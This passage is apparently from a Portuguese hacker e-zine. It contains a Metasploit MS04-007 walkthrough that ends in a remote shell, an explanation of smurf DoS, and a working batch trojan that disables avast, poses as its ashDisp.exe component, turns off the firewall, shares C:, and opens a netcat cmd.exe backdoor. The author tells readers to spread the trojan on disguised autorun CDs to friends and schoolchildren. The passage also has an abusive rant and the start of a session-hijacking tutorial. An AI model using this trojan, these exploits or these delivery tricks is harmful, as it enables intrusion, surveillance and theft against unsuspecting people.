        set           Seleciona uma variavel de ambiente temporaria 
        setg          Seleciona uma variavel de ambiente global
        show          Exibe opções, avançado, payloads, ou alvos
        unset         Remove a temporary environment variable
        unsetg        Remove a global environment variable
        use           Seleciona um exploit pelo nome 
        version       Exibe a versão do console 

Vamos obter informações de uso deste exploit, ou seja, quais os requerimentos necessarios para a execução do mesmo:

msf > use  msasn1_ms04_007_killbill 
msf msasn1_ms04_007_killbill >show options  

Exploit Options
===============

  Exploit:    Name      Default    Description
  --------    ------    -------    ---------------------------
  optional    SSL                  The target service uses SSL   /Opcional 
  required    RHOST                The target address            /Requerido (obrigatorio)
  required    RPORT     445        The target service port       /Requerido (obrigatorio)
  required    PROTO     smb        Protocol (smb or http)        /Requerido (obrigatorio)

  Target: Windows 2000 SP2-SP4 + Windows XP SP0-SP1

Para podermos executar o mesmo obviamente que temos que selecionar o alvo (RHOST - Host remoto), a porta (RPORT - Porta remota), e para este exploit funcionar se faz necessaria a seleção de um protocolo (smb), agora vamos setar o payload, para ver uma lista de payloads disponiveis digite:


msf msasn1_ms04_007_killbill > show PAYLOADS 

Metasploit Framework Usable Payloads
====================================

  win32_adduser                  Windows Execute net user /ADD
  win32_bind                     Windows Bind Shell
  win32_bind_dllinject           Windows Bind DLL Inject
  win32_bind_meterpreter         Windows Bind Meterpreter DLL Inject
  win32_bind_stg                 Windows Staged Bind Shell
  win32_bind_stg_upexec          Windows Staged Bind Upload/Execute
  win32_bind_vncinject           Windows Bind VNC Server DLL Inject
  win32_downloadexec             Windows Executable Download and Execute
  win32_exec                     Windows Execute Command
  win32_passivex                 Windows PassiveX ActiveX Injection Payload
  win32_passivex_meterpreter     Windows PassiveX ActiveX Inject Meterpreter Payload
  win32_passivex_stg             Windows Staged PassiveX Shell
  win32_passivex_vncinject       Windows PassiveX ActiveX Inject VNC Server Payload
  win32_reverse                  Windows Reverse Shell
  win32_reverse_dllinject        Windows Reverse DLL Inject
  win32_reverse_meterpreter      Windows Reverse Meterpreter DLL Inject
  win32_reverse_ord              Windows Staged Reverse Ordinal Shell
  win32_reverse_ord_vncinject    Windows Reverse Ordinal VNC Server Inject
  win32_reverse_stg              Windows Staged Reverse Shell
  win32_reverse_stg_upexec       Windows Staged Reverse Upload/Execute
  win32_reverse_vncinject        Windows Reverse VNC Server Inject

.............. Para setar o payload, alvo, porta, protocolo e lançar o exploit, digite:

msf msasn1_ms04_007_killbill >setg PAYLOAD win32_bind 
PAYLOAD -> win32_bind        //PAYLOAD setado 
msf msasn1_ms04_007_killbill(win32_bind) > setg RHOST 192.168.1.16
RHOST -> 192.168.1.16   //Alvo setado 
msf msasn1_ms04_007_killbill(win32_bind)setg RPORT 445  
RPORT -> 445 //Porta setada 
msf msasn1_ms04_007_killbill(win32_bind) >setg PROTO smb  
PROTO -> smb  //Protocolo setado 
msf msasn1_ms04_007_killbill(win32_bind) >exploit  //Lança o exploit               
[*]Starting Bind Handler.
[*]Attempting to exploit target Windows 2000 SP2-SP4 + Windows XP SP0-SP1
[*]Got connection from 192.168.139.1:32794 <_> 192.168.139.16:4444

Microsoft Windows XP [versão 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp. 

C:\WINDOWS\system32>                      

Shell obtido com sucesso. Isso prova que o metasploit é uma das melhores ferramentas para se testar a segurança de sua rede hoje, vale muito você gastar um tempinho mechendo nele, eu recomendo. 

Links para download

Framework 3.0 Windows --------> http://framework.metasploit.com/msf/downloader/framework-3.0.exe
Framework 3.0 Unix    --------> http://framework.metasploit.com/msf/downloader/framework-3.0.tar.gz

Framework 2.7 Windows --------> http://metasploit.com/tools/framework-2.7.exe
Framework 2.7 Windows --------> http://metasploit.com/tools/framework-2.7.tar.gz

Para obter informações com relação aos alvos do exploit (depois que o mesmo for setado):

msf msasn1_ms04_007_killbill > show TARGETS

Supported Exploit Targets
=========================

   0  Windows 2000 SP2-SP4 + Windows XP SP0-SP1


Para obter mais informações sobre a falha:  

msf msasn1_ms04_007_killbill > info msasn1_ms04_007_killbill

   Name: Microsoft ASN.1 Library Bitstring Heap Overflow
   Class: remote
   Version: $Rev: 3818 $
   Target OS: win32, win2000, winxp
   Keywords: asn1
   Privileged: Yes
   Disclosure: Feb 10 2004

Provided By:
    Solar Eclipse <solareclipse [at] phreedom.org> [GPLv2 License]

Available Targets:
    Windows 2000 SP2-SP4 + Windows XP SP0-SP1

Available Options:

    Exploit:    Name      Default    Description
    --------    ------    -------    ---------------------------
    optional    SSL                  The target service uses SSL
    required    RHOST                The target address
    required    RPORT     445        The target service port
    required    PROTO     smb        Protocol (smb or http)

Payload Information:
    Space: 1024
    Avoid: 0 characters
   | Keys: noconn tunnel bind ws2ord reverse

Nop Information:
 SaveRegs: esp ebp
   | Keys:

Encoder Information:
   | Keys:

Description:
    This is an exploit for a previously undisclosed vulnerability in
    the bit string decoding code in the Microsoft ASN.1 library. This
    vulnerability is not related to the bit string vulnerability
    described in eEye advisory AD20040210-2. Both vulnerabilities were
    fixed in the MS04-007 patch.

    You are only allowed one attempt with this vulnerability. If the
    payload fails to execute, the LSASS system service will crash and
    the target system will automatically reboot itself in 60 seconds.
    If the payload succeeeds, the system will no longer be able to
    process authentication requests, denying all attempts to login
    through SMB or at the console. A reboot is required to restore
    proper functioning of an exploited system.

References:
    http://www.osvdb.org/3902
    http://www.phreedom.org/solar/exploits/msasn1-bitstring/
    http://www.microsoft.com/technet/security/bulletin/MS04-007.mspx
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0818
    http://www.milw0rm.com/metasploit/40


----- C4p1Tul0 10
                                     
                                      //--//--//--//--//--//--//   //--//--//--//--//--//--// 
                     ||============#||Entendendo o smurf ||#==============#|| 
                                              O meu ultimo topico no darkers      
                                                      6_BL4CK9_F0X6
                                      //--//--//--//--//--//--//   //--//--//--//--//--//--//
 
Quando o atacante faz um ataque do tipo smurf, sua estaçao irá emitir pacotes UDP, mais necessariamente pacotes ICMP echo request para toda a "rede alvo" usando um tipo de transmissão de dados chamada de broadcast, esse tipo de transmissão emiti pacotes de dados para toda a rede, nesse caso serão enviados pacotes ICMP echo request para os endereços de broadcast da rede que existem computadores que serão usados como piões para o ataque, este IP normalmente é o X.X.X.255, quando os piões recebem o pacote ICMP echo request imediatamente ele retornam pacotes ICMP echo reply ou melhor dizendo: retornam pings. Já que fiz um broadcast para mandar pacotes de requisição para os host piões, então todos iram mandar pacotes ICMP echo reply quase simultaneamente, mas só que ao invés de mandar os pacotes de resposta para o atacante (que lançou o broadcast), os dados vão ser enviados para o computador da vítima usando uma técnica chamada IP spoofing para fazer os piões acreditarem que quem fez a solicitação foi a vítima, assim fazendo com que o computador alvo do ataque receba muitos pacotes ICMP echo reply como resposta de uma solicitação que não fez, conseqüentemente não conseguindo processar todos os dados recebidos ocasionando o travamento do alvo. Existem muitos programas ótimos para realizar o smurf, os melhores são o WinSmurf e o Smurf2k. 

http://www.hunterhacker.xpg.com.br/smurf1.jpg

Para se proteger desse ataque basta configurar seu firewall para nao responder a solicitaçao de eco de entrada e pronto, pois este ataque se aproveita do envio de ICMP echo request. 

Hoje eu estou feliz, ri muito porque um panaca la do forum do darkers disse que IPspoof so funciona em rede interna huahauhHuahUh!!! Trouxa!!!! Seu lammer nojento, espero que seu corpo queime eternamento no fogo do inferno, seu rato podre, escoria da sociedade,  vai varrer o site do banco do brasil com o languard HuahUhauH Lammer!!! Tu consegue ate fazer bruteforce no FTP do banco do brasil se usar o X-Scan-v3.3, tu pode varrer todas as portas tranquilamente, tenta ae hUhauh, tenta quebrar o VNC do banco, vai correndo rato. Sua raça imunda acaba de ler uma coisa e mesmo sem saber o que vai fazer vai logo varrendo hosts, sem contar que mesmo sem saber da coisa ficam discutindo com quem entende dizendo besteira nos foruns. Seu filho da puta tosco, macaco imundo. Olhem a rata que esse vermezinho chamado Mateus deu la no meu topico Smurf. 

Porque eu odeio esse lammer:

Parece estranho mesmo eu escrever sobre um lammer na minha zine, mas minha indignaçao foi porque esse mesmo lammer de tanto falar besteira fez despertar o meu chacra interior de raiva e eu comecei a menospreza-lo, esse mesmo idiota fez eu ser banido do forum do darkers, digamos que foi a gota dagua para o cuzao do reeves. 


----- C4p1Tul0 11

                                 //--//--//--//--//--//--//  MEXT //--//--//--//--//--//--// 

               ||============#||THE KING OF CALCULATORS||#==============#|| 
                                                         6_BL4CK9_F0X6
 
                                 //--//--//--//--//--//--//  MEXT //--//--//--//--//--//--//
 
Reparem bem que na maioria dos forums tem sempre um cara que posta uma calculadora uhauihauiahiau, e foda mesmo, os caras lascam tudo, nao vou mentir que quando comecei a mecher com C, comecei por uma calc, mas depois prometi para mim mesmo:

Primeira aplicaçao............Nunca mais sera uma calculadora 

Uhauahgayg Meu primeiro code em perl foi um cadastrador de clientes, muito maneiro, mas para quem gosta de se basear ae pelas calcs vou sempre tar postando fonts de calcs ae pra galera ter como exemplo de code, tu veras calcs em varias linguagen, tais como, C, perl, Javascript e tals.

Aviso para o curso de batch que ta vindo ae

Como eu sempre arrumo um tempinho aqui  resolvi fazer ae pra voces um calculadorazinha bastante simples, apenas para servir como base para aqueles que estao começando a programar em batch, daqui uns dias vou ta postando ae um curso mais que completo de programaçao em batch. Voce simplesmente ficara impressionado em saber o que um simples batch e capaz de fazer ehhe (diabinho), ja fiz um programa de bruteforce que exibe a senha do maluco, mapeia a unidade dele e faz muitas outras piruetas loucas. Atualmente desenvolvo em batch anti worms e malwares, que quando entram no sistema começam a levantar informaçoes sobre tudo da vitima e salva tudo em uma pasta recem criada na pendrive, ou seja, voce coloca a pendrive na USB com meu malware em autorun por 30 segundos no maximo, dae voce consegue informaçoes de ate 6 meses sobre a vitima eheheh Bendito seja o santo batch, faço coisas incriveis com arquivos em lote pessoal (como voces vao ver no capitulo backdoor camuflagem) e voces tambem vao aprender, so pesso que Aguardem....

@echo off
title Calculadora simples v0.1 by 6_Bl4ck9_f0x6

:principal
cls
Echo Calculadora simples v0.1 by 6_Bl4ck9_f0x6	
color a
echo. & echo. 
echo Somar         = 1 
echo Dividir       = 2 
echo Subtrair      = 3
echo Multiplicar   = 4
echo Calcular Cubo = 5
echo. & set /p choice=Digite um numero [Para setar o operador]:
if %choice% EQU 1 (goto Somar) 
if %choice% == 2 (goto Dividir) 
if %choice% EQU 3 (goto Subtrair) 
if %choice% == 4 (goto Multiplicar)
if %choice% EQU 5 (goto Cube) 
IF %ERRORLEVEL% GEQ 6 goto Ops
IF %ERRORLEVEL% LSS 1 goto Ops

:Somar
cls
echo Este e o seu operador: + 
echo. & set /p numero=Digite o primeiro numero: 
set /p numeroD=Digite o segundo numero:
set /a somar=%numero% + %numeroD% 
echo. & echo %numero% + %numeroD% = %somar% & echo.
pause & goto principal

:Dividir 
cls
echo Este e o seu operador: /
echo. & set /p numero=Digite o primeiro numero:
set /p numeroD=Digite o segundo numero:
set /a multiplicar=%numero% / %numeroD%
echo. & echo %numero% / %numeroD% = %multiplicar% & echo.
pause & goto principal

:Subtrair 
cls
echo Este e o seu operador: -
echo. & set /p numero=Digite o primeiro numero:
set /p numeroD=Digite o segundo numero:
set /a subtrair=%numero% - %numeroD%
echo. & echo %numero% - %numeroD% = %subtrair% & echo.
pause & goto principal

:Multiplicar
cls
echo Este e o seu operador: *
echo. & set /p numero=Digite o primeiro numero:
set /p numeroD=Digite o segundo numero:
set /a multiplicar=%numero% * %numeroD%
echo. & echo %numero% * %numeroD% = %multiplicar% & echo.
pause & goto principal

:Cube
cls 
echo Calculo de cubo & echo.
set /p numero=Digite o primeiro numero: 
set /p numeroD=Digite outro numero:
set /p other=Agora o ultimo numero:
set /a calculoC=%numero% + %numeroD% + %other% 
echo. & echo %numero% + %numeroD% + %other% = %calculoC% & echo. & pause 
goto principal 

:ops
cls 
echo. 
echo EI CARA OPERADOR INVALIDO 
echo. 
echo Para continuar pressione qualquer tecla... &  pause > nul 
goto principal


----- C4p1Tul0 12 

                          [Texto escrito por mim originalmente para a porra do darkers] 
       
              |=--------------------=[BackDoor Camuflagem]=----------------------------=|
              |=------------------------||for avast! antivirus||--------------------------------=|
                                                     |     -+   BY   +-     |
              |=--------------=[6_Bl4ck9_f0x6  <b-fox@bol.com.br>]=-------------------=|

                                                      (Minha ideia recente)

Ei, ei, ei, feliz natal, ops, ho! ho! ho!... é um negocio assim...?...Bah! Deixa pra lá, ei galera alguém pode me dizer se os Hackas comemoram o natal? Putz, ninguém ta festejando por aqui, chamei os caras, mas preferem ficar na frente do samsung se bronzeando, deixa queto e vamos logo falar de uma nova coisinha interesante que pensei aqui, vamos a historia de hoje:

Era uma vez um garoto que queria injetar um backdoor baseado no netcat (por ser indetect) em um sistema de um amigo que num tava querendo lhe dar (gratuitamente) os videos do pride (é esse mesmo que voce ta pensando, lutas e tals, "finado" ryan grace) para o mesmo dar uma olhada na pancadaria em pleno natal, dae o que foi que esse rapaz fez?  Abriu o portão de casa (sem camisa ainda), com o seu velho cigarrinho na boca e uma imensa cara de pau, discaramente ele bateu na porta do vizinho e quando o mesmo apareceu ele falo:


- Feliz natal vizinho, trouxe uns videos de sacanagem para voce assistir cara.


Deu um presente de natal para esse amigo. Era um DVD recheado de filmes de sacanagem devidamente comprimidos com o KGB (ou seja, muitos) e um trojan hauahuha!!!

Mas eu tinha que fazer bem feito né galera, pois o cara (confiando muito nos amigos) todo santo dia olha o registro para ver se tinha algo suspeito se iniciando (traumatizado com o pessoal), putz (pensei), dae complica. Antes de ir bater no portão da casa dele pensei, pensei, pensei, e pensei. Nessa brincadeira passei 10 minutos, entre cigarros e Final Fantasy IX hauhauha!!! derrepente....Tchanram!!!

Bingo!!! pensem comigo:

O cara todos os dias olha lá no msconfig e ve sempre a mesma coisa:

 
Item de inicialização | Comando               |  Local

ashdisp.exe             Path do ashdisp.exe    HKLM\Software\Microsoft\windows\currentversion\run
 

Ou seja, o cara sempre via o componente do avast, sacou? Então o que temos que fazer é transformar o nosso backdoor no avast. Como?

Assim:

REM Compile este font com o nome Camuflagem.exe
REM Certifiquese de que a unidade Master da vitima é a C: mesmo,
REM se não souber use a variavel de amgiente %PROGRAMFILES%
taskkill /f /im ashDisp.exe         
cls                                         
taskkill /f /im ashMaiSv.exe                 
cls                                 
taskkill /f /im ashServ.exe     
cls
taskkill /f /im ashWebSv.exe
cls
taskkill /f /im aswUpdSv.exe
cls
copy Camuflagem.exe "C:\Arquivos de programas\Alwil Software\Avast4"
reg delete HKLM\Software\Microsoft\windows\currentversion\run /v avast! /f
del "C:\Arquivos de programas\Alwil Software\Avast4\ashDisp.exe 
rename "C:\Arquivos de programas\Alwil Software\Avast4\Camuflagem.exe" ashDisp.exe
reg add HKLM\Software\Microsoft\windows\currentversion\run /v avast! /t REG_SZ /d "C:\Arquivos de programas\Alwil Software\Avast4\ashDisp.exe"
Copy D:\netcat\*.* %systemroot%\system32
net stop sharedaccess
net share c=c:\
net start telnet         ---- > Se tiver suporte (obvio)
nc -L -vv -p 12345 -e cmd.exe


Cria ae um autorun e compilar os codigos em batch ae em cima e complementa o CD com algumas paradas que a vitima goste, assim ela ficará tão impressionada com o presente que nem se quer vai pensar que tem um trojan no CD, tipo cara:

O meu amigo é fisurado em muié, dae intupi um DVD de sacanagem e dei, o cara mesmo que soubesse que tinha trojan num ia ta nem ae Huahuahauh!!!!

Este é um Backdoor bastante interesante se tratando da sua indetectabilidade em alguns casos, essa palavra existe? Que se foda eu não quero nem saber, vou descrever as suas funções e escrever um pequeno manual do usuario para voces seguirem, vamos lá. Primeiramente eu gostaria de dedicar esse backdoor a minha amada Gracinha por ela sempre limpar as cinzas de cigarro que insistem em cair no meu quarto por causa dos idiotas cegos que frequentam a minha casa e chutão a droga do cinzeiro huahauhau!!!!. Camuflagem é feito para o avast! Antivirus mas pode ser adptado tranquilamente para qualquer outro antvírus ou programa que se inicie na maquina. vou dar exemplo do que estes simples codigos acima são capazes de fazer apenas compilados colocados em um CD e evidentemente colocados no drive da vitima.


A rota

A rota que o Camuflagem segue é a seguinte:

No momento que o cd que esta infectado com o Camuflagem entrar no drive da vitima ele matará o antvírus (pra ele num piar) se copiará para o diretorio padrão do avast e lá ele vai deletar a chave de registro do ashdisp.exe, que é um componente do avast que cria uma chave no registro para se inicializar na maquina, este componente possui um valor sequêncial de nome avast!. Logo em seguida ele deletará o ashdisp.exe e se renomeará com o nome ashdisp.exe e criará outra chave no registro com o mesmo nome do valor da chave deletada para inicialo toda vez que a vitima se logar na maquina, copiará os componentes do netcat que esta no cd para o diretorio do sistema, matará o firewall do windows (pra ele também num piar), compartilhará a unidade c: do cara (meu vizinho ta no mesmo ISP que eu hauhauha), abrirá a porta telnet do PC dele, e vai abrir a porta 12345 com o netcat (homenagem ao netbus), ufa!!!. Assim quem for no msconfig vai ver o seguinte:


Item de inicialização | Comando                  |  Local

ashdisp.exe            Path do ashdisp.exe        HKLM\Software\Microsoft\windows\currentversion\run



Eita bichim pra se esconder huahauhau!!!! Alguém ae diz que isso ae em cima é um trojan?


Aplicação Fantasma

A vitima não desconfiará que o avast é na verdade um trojan camuflado. Mas infelizmente ele não esta perfeito falta alguns retoques, tenha em mãos um compilador de batch chamado Quick Batch File Compiler estou usando o versão 2.1.5.0, esta ferramenta será bastante util pois se a vitima utilizar algum software que exibe os icones dos itens de inicialização da maquina ele será facilmente detectado, pois nosso Backdoor não tem um icone por enquanto, por isso e por mais alguns motivos que utilizaremos o Quick Batch File Compiler.
Importe o seu Batch com o codigo fonte acima para o Quick Batch em open (obvio), logo depois va em Project > Options. Na guia General marque a caixa de texto Ghost Application ou Aplicação fantasma, se a sua versão for em inglês (eu acho que só tem em inglês) aqui vai uma tradução:
 


This type application will not create any windows.
May be useful for 'Silent' installation.         

Este tipo de aplicação não ira criar nenhuna janela.
Talvez seja util para uma instalação silenciosa.


Huhuhuhuhu!!! UiUiUI hauahuha, "sem console". Então isso significa que nos podemos rodar em modo oculto sem aquele console troncho do DOS dizendo que o netcat esta escutando em uma porta, de um OK, agora vá na guia Custom Resources > Application Icon e importe o icone do ashdisp.exe original, calma, calma, eu vou ensinar como se obter qualquer icone de qualquer executavel mas para isso voce precisa da nossa ultima ferramenta de trabalho, o programa se chama Resource Hacker pode ser encontrado em:

http://www.hunterhacker.xpg.com.br/15.rar

Com esse programa podemos decompilar e recompilar um executavel com os codigos auterados, para esse ato se da o nome de engenharia reversa, mas nesse caso vamos pegar apenas o icone (por hora). Com o programa em mãos abra-o (dã) e importe o arquivo executavel que deseja obter o ícone, no caso é o ashdisp.exe. Ja dentro do programa vá na mini-pasta onde está escrito icon e explore a mesma até encontar as imagens de icones, dai e só clicar com o botão direito e salvar o ícone. Com o ícone ja salvo agora importe-o com o Quick Batch e compile o seu Arquivo em lotes (F9) com o ícone do ashdisp.exe, depois de salva-lo com o ícone do ashdisp.exe estamos eliminando a possibilidade de indentificação por visualizadores de processos que exibem os ícones dos itens de inicialização, mas e se por acaso este mesmo identificador de processos (como process view por exemplo) além de exibir o icone exibir também as propriedades dos itens no startup? Eheheeh, vamos roubar também as propriedades do ashdisp.

Roubando as propriedades do ashdisp.exe

Link ae:

http://www.hunterhacker.xpg.com.br/propriedades.txt

Importe este script de propriedade para o camuflagem com o reshacker e cole na mini pasta correspondente as propriedades do aplicativo, depois clique em compile script para compilar estes scripts no camuflagem, prontinho, já temos o nosso clone, agora crie um CD em autorun com o seguinte nome na parte de cima do CD:

A virgem da minha vizinha transando com minha prima parte 1 de 66. Esqueça este CD na casa de algum amigo seu que você tem o IP e todos os messes deixe uma continuação hauhauah!!! pronto, vá pra sua casa e se conecte no PC dele enquanto o tarado ver a suposta prima de alguém trepando com outra mulher (arrume um filme caseiro pra ficar mais convincente, eheh), assim enquanto ele olha o filme você está roubando os arquivo dele acessando algum servidor de FTP por telnet no PC dele e jogando (put) os arquivos dele pro seu servidor.   


Pense bem com relação a esssa historia de autorun:

K2ps ------- > TJ de informação, manda tudinho pro POP bastando configurar previamente o SMTP. Esqueça um monte de CDs com joguinhos em frente a uma escola de pirralhos "cheios da grana", derrepente voce terá os logs dos pais deles hauhauhauh!!! Experiencia propria HUahuahuah!!!! Huhuhuhuhuhuhuh. Putz, só foi eu terminar de escrever o pessoal já chegou, até os hackas comemoram o natal uhauah!!! Falow mein freuds, até a proxima....


SHOTS:

Procurem na porra do darkers



----- C4p1Tul0 13

                               //--//--//--//--//--//--//  Zx|zZ //--//--//--//--//--//--// 
               ||==============#||       Humor Hacker       ||#==============#||
               ||==============#|| RIPADO DA ZINE F3||#==============#||
                               //--//--//--//--//--//--//  Zx|zZ //--//--//--//--//--//--//

             

        _xXXXP^''                    ``^YXXXx_
     _xXXXXP~     14 - Entrevista -      ~YXXXXx_
  _xXXXXXX(            Cheat Struck        )XXXXXXx_
xXXXXXXXXXXbxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxdXXXXXXXXXXx
YXXXXXXXXXXP^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^YXXXXXXXXXXP
  ~YXXXXXX(                                )XXXXXXP~
     ~YXXXXb_        Cheat Struck        _dXXXXP~
        ~YXXXbx..                    ..xdXXXP~

Struck: Finalmente conseguimos contato com essa ilustre figura do
        hacking brasileiro: Cheat Struck.
        Ola.
Struck: Alou.

Struck: Como voce se sente?
Struck: Meio nervoso. Nunca fui entrevistado antes.

Struck: Entao para quebrar o nervosismo posso comecar com uma pergunta
        pessoal??
Struck: Hmmm.. ok

Struck: Voce tem namorada??
Struck: nao.

Struck: Como que pode um bunitao como voce nao ter namorada?
Struck: Ora essa. Voce que eh lindo.

Struck: Obrigado. Mas acho que nao eh isso que nossos leitores pretendem
        saber nesta entrevista.
Struck: Espero que nao, afinal 99% dos leitores da f3 sao homens.

Struck: Realmente.
Struck: ...

Struck: ...
Struck: hm... 

Struck: ;)
Struck: =*

Struck: Diga algo que nossos leitores possam se interessar.
Struck: Sei la. Que tal computadores?? 

Struck: Boa. Conte-nos como foi sua primeira relacao com um computador.
Struck: Bem... cof! cof! Achu que isso eh meio pessoal.

Struck: Voce ja gozou no teclado?
Struck: Nao. Eu costumo usar a mao como escudo.

Struck: Hm... interessante.
Struck: Eh preciso ter reflexos rapidos.

Struck: Voce tem algum super poder??
Struck: Eu posso fazer o monitor ficar preto apenas olhando para ele
        por alguns minutos.

Struck: Puxa vida! Aposto que vc nunca precisou usar screem savers.
Struck: Hmm... eh verdade. Talvez isso acontecao por causa dos screem
        savers. Nunca havia pensado nisso.

Struck: Entao fora isso, o que voce sabe fazer??
Struck: Eu sei fazer ezines.

Struck: O que eh isso?
Struck: Eh um monte de textos que eu escrevo sobre coisas inuteis que
        nunca precisaremos usar na vida real.

Struck: E as pessoas leem isso?
Struck: Por incrivel que pareca.

Struck: Fale-nos mais sobre estas ezines.
Struck: Atualmente eu escrevo a fatal3rror. Ja escrevi a cszine, alem
        de materias para a DeathKnights, s13, entre outras.

Struck: E te pagam para escrever estas materias?
Struck: Nao.

Struck: Entao pq voce as escreve?
Struck: Porque eu sou troxa.

Struck: Serio.
Struck: Sei la! Falta do que fazer, hobbie, for fun,... Sei la.

Struck: Qual seu objetivo com estes textos??
Struck: Primeiramente, aprender mais. Pq assim como no colegio, qdo 
        voce faz um trabalho, pesquiza mais sobre o assunto e assim
        aprende mais.

Struck: e os outros objetivos??
Struck: Ah sim!!
        Fama, gloria pessoal e status na sociedade.

Struck: Como surgiu a ideia de escrever uma zine?
Struck: A fatal3rror surgiu do nada. Uma noite eu comecei a juntar os
        textos q tinha comecado a fazer e nao acabei. Dei uma relida,
        conclui-os e juntei tudo num txt soh. Joguei na inet e as
        pessoas comecaram a ler...

Struck: E qto a cszine??
Struck: Nakela epoca eu catava tudo qto era textos sobre h/p/c/s/v e
        escrevia sobre o que havia aprendido.
        No final da semana colocava na page para amigos que tb estavam
        comecando, lerem...

Struck: E pq ela acabou??
Struck: Pq comecou a fazer sucesso. Ae rolava pressao pra zine sair a
        tempo, essas coisas. Nao curtia isso, entao cabei com a zine.

Struck: Depois disso o que voce fez??
Struck: Entrei na dk.

Struck: e...
Struck: Foi isso.

Struck: O que voce fazia na deathkinghts??
Struck: Eu escrevia para a zine deles, e qdo precisava, ajudava o grupo
        ou os membros a ownar algumas maquinas.

Struck: E saiu pq??
Struck: Deu uns rolo com a bl0w. Eu conhecia o pessoal dos 2 lados
        entao pra nao sobrar pra mim, sai.

Struck: Voce foi membro da bl0w??
Struck: Nop. Apenas frequentava o canal restrito aos membros, mas nunca
        fui convidado a ser membro. E se fosse, nao aceitaria, afinal
        na epoca eu era da dk.

Struck: Voce faz defaces??
Struck: Ja fiz. Na epoca da dk.

Struck: Quais eram os motivos?
Struck: Diversos. Cada membro tinha seus proprios motivos. O grupo deixava
        bem claro que nao se responsabilizava pelo ato de seus membros.

Struck: E quais eram os seus motivos??
Struck: Eu ia de gaiato. Ajudava os outros. Unica vez que fiz deface por
        motivos proprios, foi qdo o Cacaio tava com problemas com a
        policia. Ae eu e o encrypt fizemo um Mass Hack em mais de 100
        paginas com o protesto.

Struck: E vc ainda faz defaces??
Struck: Nao.

Struck: Pq??
Struck: Nunca vi graca em alterar paginas sem proposito nenhum. Se um
        dia eu precisar ser ouvido eu talvez volte a fazer defaces. Mas
        provavelmente isso nao aconteca pq agora se precisar falar alguma
        coisa, tenho a f3 para isso.

Struck: Depois que saiu da dk o que houve??
Struck: Foi +/- a epoca que comecei a beber feito um gamba.
        Talvez por isso nao lembre direito o que aconteceu nessa epoca.

Struck: Porra! Voce recebeu convites de outros grupos!
Struck: Ah eh!! Obrigado por lembrar. Embora eu nao tenha entrado em
        nenhum realmente.

Struck: Ja sao 4:30 da madrugada no horario de verao. Acho que podemos
        acabar com essa entrevista nao eh??
Struck: Achu q ninguem se importaria se isso acontece-se.

Struck: Sera que tem gente que leu essa reportagem ateh aki??
Struck: Provavelmente nao. Nem eu mesmo estou lendo o que escrevo pra
        nao ter desgosto.

Struck: Entao ta. Obrigado por seu tempo.
Struck: Meu tempo eh todo seu.

Struck: Realmente...
Struck: Se liga que amanha temos prova.

Struck: Eh mesmo. Vou dormir. Boa noite.
Struck: Falow!!
                                           
  

----- C4p1Tul0 14
      

                           [+ ======X============X===============X===== +]                                                                                                                                     XxX 
                                 CONFIGURANDO O ETTERCAP EM MODO SHELL                                
                           ||=================#||      E        |#=================|| 
                                                             HIJACKING DE HTTP                                
                                                                        +  bY + 
                                                                   6_Bl4ck9_f0x6
                           [+ ======X============X===============X===== +]



Ola pessoal, olha eu aqui outra vez, eu tenho que parar de escrever e começar aprender, mas num da, to meio viciado em escrever ehehehe, mas acredito que voces nao querem saber disso. Pois bem, agora vou demonstrar a principal tecnica utilizada por mim e que pode ser muito util algum dia para voces, o sequestro de seçao de HTTP, tambem vou falar do sequestro de telnet apenas como complemento (em um capilo futuro), na pratica nunca usei Hijacking de telnet contra alguem, primeiro porque em telnet num rola a cripto e existe uma possibilidade muito remota de uma empresa utilizar este serviço e segundo e porque usuario comuns (a escoria da sociedade) nao sabe nem o que e telnet Huahauh!!!. Vamos la, acredito que voce ja tao de saco cheio de ouvir teoria sobre Hijacking, minha intençao aqui nao e encher voces com mais teoria, vamos a uma receitinha de bolo, ou seja, vamos partir para a açao, porque ninguem vive de teoria. Voce precisará carregar na pendrive dois programas, o primeiro e o ettercap para redirecionar o trafego dos computadores caso voce nao esteje no gateway, o que pode ser muito provavel caso voce seguiu a vitima e ela esteje em uma lan house que seja de pessoas desconhecidas, voce nao vai chegar no dono da lan e dizer:

- Ei, licença, eu poderia usar esse computador para capturar os pacotes daquele computador que aquela senhorita está usando? Huahuahauh!!!!

-Isso é bem melhor para voce cara, vai por mim, pois se eu nao usar esse computador vou precisar recorrer ao  arp poisoning e isso é um perigo muito grande porque pode acontecer o tal ACK Storm quando eu atacar, pois nao tenho tempo de usar syn flood. Hauhauhauahuahuahauh!!!!

O cara vai franzir a testa e olhar pra voce com uma interrogaçao na cabeça, tipo os mangás e dizer:

- Seja la o que for isso a reposta é Nao!!!!  kkkkkkk

Dae voce tem que pegar o trafego na marra, por isso voce precisa do ettercap, pois voce vai utilizar arp poisoning, coisa que ja ta todo mundo enjoado de ouvir falar. O segundo programa é o Spynet que pode ser encontrado no:
 
http://www.elhacker.net/           ------ >>> O site que eu mais amo na vida, me ajudou muito no meu começo :- )
             ou
http://www.hunterhacker.xpg.com.br/21.rar 

O nome Spynet na verdade é apenas o nome do pacote, pois depois de sua instalaçao voce tera dois programas na maquina, que sao o CaptureNet que é um bom sniffer e o PeepNet, montador de cookies que usa os dados capturados pelo CaptureNet para sequestrar a seção, ou seja, ele remotando o cookie da galera.

Vamos começar pelo ettercap.

Vou demonstrar exemplos de linha de comando, porque GUI nao e bom para o seu aprendizado, por que se voce aprender a lidar com linha de comando no ettercap voce poderá aproveitar muito mais esta ferramenta, pois voce podera utilizalo usando o telnet para sniffar pacotes das estaçoes na rede do computador invadido, coisa que nao seria possivel de ser feita (pelo menos nao sem levantar suspeitas) usando algum programa de assistencia remota como o VNC, mas obvio que isso não é regra, pois voce pode injetar a dll do VNC no host sem levantar suspeitas exploitando uma falha no mesmo e começar a mecher nele graficamente, para isso utilize o metasploit. Mas vamos nos focalizar no ettercap via command line. Julgando que você tem que ser rapido no seu sequestro, pois a vitima pode apenas querer dar uma olhada no seu orkut e logo sair, vamos continuar este texto. Bem, ja que voce tem que ser rapido em utilizar as ferramentas, entao use uma variavel de ambiente logo de cara no executar para abrir o shell do ettercap, ao inves de chutar uma unidade master de um computador que voce nunca viu e evitar aquele pã do windows ehehe, ou seja, abra o shell dessa maneira:

cmd /k cd %ProgramFiles%\EttercapNG\                 

